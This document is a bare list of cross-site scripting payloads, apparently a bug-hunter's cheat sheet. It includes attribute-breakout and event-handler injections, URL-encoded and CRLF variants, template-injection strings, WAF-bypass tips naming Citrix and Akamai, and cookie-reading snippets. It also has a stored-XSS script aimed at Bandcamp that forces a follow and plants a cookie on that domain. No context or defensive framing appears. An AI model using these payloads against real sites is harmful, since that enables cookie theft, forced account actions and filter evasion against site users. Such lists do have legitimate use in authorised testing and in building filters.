Sokkar"><Img src oNLY OnError=prompt(document.cookie)>

Sokkar"><"S
Sokkar"><"Sugar

"%3e%3cIG%20sRC=X%20OneRRoR=alert(document.cookie)%20"%3c
">
xxxx"/>%3cbutton%20popovertarget=bugvsme%3eCLICK%20HERE%3c/button%3e%3cxxx%20onbeforetoggle=alert``%20popover%20id=bugvsme%3eTEST%3c/xxx%3e
Sokkar'"onload="alert('done')'">alert('done')
test">
$ugar
%22onpointermove%3Dprompt%281%29+class%3Dss11+
%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
alert('Stored XSS on BandCamp')

alert('Your cookies: ' + document.cookie)
document.getElementById('follow-unfollow').click()
alert('Thas for the follow :^D')
document.cookie = 'hacker=cdl;path=/;domain=.bandcamp.com'
CLICK ME
http:falselink.com;"onmouseover%20=%0az=top;z[/al/.source%2b/ert/.source](8);//test.com/

<img src="
">]

">

[alert][0].call(this,1)
%26%2302java%26%23115cript:alert(document.domain)
“>%0D%0A%0D%0A
You can always make use of the following characters to bypass your WAF:

+, -, %, /
Example: "/alert()/"//
Example : "%alert()%"//
%7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D
”>alert(“WHOAMI?”)

<%2FScriPt>document.write(document.cookie);<%2FsCriPt>
"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"
alert%28%29
<?php header("Content-Type: application/javascript"); ?>